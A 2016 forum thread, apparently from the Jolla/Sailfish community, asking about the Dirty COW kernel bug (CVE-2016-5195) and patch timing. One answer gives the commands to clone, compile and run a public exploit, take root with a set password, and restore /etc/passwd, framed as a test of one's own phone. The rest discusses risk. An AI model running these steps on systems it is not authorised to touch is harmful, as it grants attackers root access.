asked 2016-10-21 10:56:29 +0300
... are there any thoughts about kernel patches like https://dirtycow.ninja? Is ist possible?
answered 2016-11-02 15:02:28 +0300
Our plan is to include the fix to the upcoming 2.0.5 release.
So this means 1-2 months from now for those who don't use developer previews? When the bug is being exploited in the wild?
Federico ( 2016-11-02 19:50:58 +0300 )@Federico The bug isn't remote-exploitable, so as long as you only install and use trustworthy software, the risks aren't that huge on a phone. Of course, if an attacker manage to get remote access on the user account, dirty cow could still be used to gain root, so the risks aren't negligible. All in all, I'm not that worried about this. Remote attacks on e.g. the broken wifi-drivers are worse, imo. (Thanks for that, Qualcomm, and thanks for the free and swift bugfixes! Your products are really trustworthy, and I'm really looking forward to buy another device made with your chips again! /sarcsasm)
Fuzzillogic ( 2016-11-02 23:01:54 +0300 )answered 2016-10-21 12:11:47 +0300
I have compiled and tried exploit on my Jolla C and it totally freeze my phone, so i need to pull battery. This means no easy way to use this exploit on Jolla C :D
answered 2016-10-29 17:41:25 +0300
The Dirty Cow hack works very well on a Jolla. Dirty Cow has a well-known issue that crashes Linux unless you disable writeback, however that has a simple work-around.
To test on your own phone:
pkcon install gcc gcc-c++
git clone https://github.com/gbonacini/CVE-2016-5195.git
cd CVE-2016-5195/
make
./dcow ; su
Use: dirtyCowFun as your password
You are now root! However, to avoid an imminent crash, you must quickly also do:
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
This has all been run and verified on both my Jolla1 and my FairPhone2, so the exploit is very much valid for Sailfish!
Finally, to close the hole you just opened to get root, you should:
cp .ssh_bak /etc/passwd
WARNING! Unless you understand the details about /etc/passwd, you should not try this exploit: You risk opening your phone to the world! This will quickly result in your phone becoming a bot-net zombie for spammers, your ip added to all sorts of blacklists, and your battery being continuously drained to email hundreds of thousands of spam.
This very brilliantly demonstrates the need for an urgent kernel patch for the Jolla systems
Richard
richardski ( 2016-10-31 12:56:00 +0300 )Having seen how easy this is to exploit, I'm currently very nervous about connecting my phone to any network and fully agree that this should be fixed in an urgent kernel patch/hotfix release.
Frederik
FrederikF ( 2016-11-01 00:20:50 +0300 )It's not quite that bad on a phone, since you have to log in with a user account before you can run the exploit. Usually, only the owner of the phone has an account on it. So, unless you have ssh enabled with a weak password, you should be OK. However, on a multi-user Linux server, it is a disaster!
That is true if you are sure that none of the applications you have installed is able to run unchecked code. (OK, we're talking about two separate exploits really, but then people have called me paranoid before, when it comes to computing)
FrederikF ( 2016-11-01 21:47:20 +0300 )answered 2016-10-28 16:00:34 +0300
New Kernel 3.4.113 does include a patch. Now we have to wait until it shows up on devices...
Asked: 2016-10-21 10:56:29 +0300
Seen: 2,134 times
Last updated: Nov 02 '16